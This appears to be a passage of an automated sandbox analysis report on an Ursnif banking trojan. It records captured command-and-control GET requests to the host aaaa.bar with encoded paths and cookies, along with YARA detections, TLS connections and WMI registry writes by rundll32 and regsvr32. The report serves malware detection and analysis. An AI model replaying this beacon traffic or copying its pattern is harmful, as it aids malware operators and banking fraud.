                      Source: global trafficHTTP traffic detected: GET /jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2B/ce4ORl02hRz9Esp/_2BVvpIh9LurZ83S_2/B0O2_2FdR/gIrNQT1mMUiZ_2BS_2BT/MDTnU5RczKhEBmBWqGJ/EyrDp1_2FuqKMBIze3vzAt/t9EP4e8z_2FDf/kKFLZbmvwAVEbK/QjYP.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
                      Source: global trafficHTTP traffic detected: GET /jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
                      Source: global trafficHTTP traffic detected: GET /jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
                      Source: global trafficHTTP traffic detected: GET /jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en
                      Source: global trafficHTTP traffic detected: GET /jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
                      Source: global trafficHTTP traffic detected: GET /jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
                      Source: global trafficHTTP traffic detected: GET /jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
                      Source: global trafficHTTP traffic detected: GET /jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en
                      Source: global trafficHTTP traffic detected: GET /jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
                      Source: global trafficHTTP traffic detected: GET /jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49821 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49825 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49826 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49837 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49836 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49835 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49834 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49952 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49954 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49963 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49969 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.798415172.000000000116B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
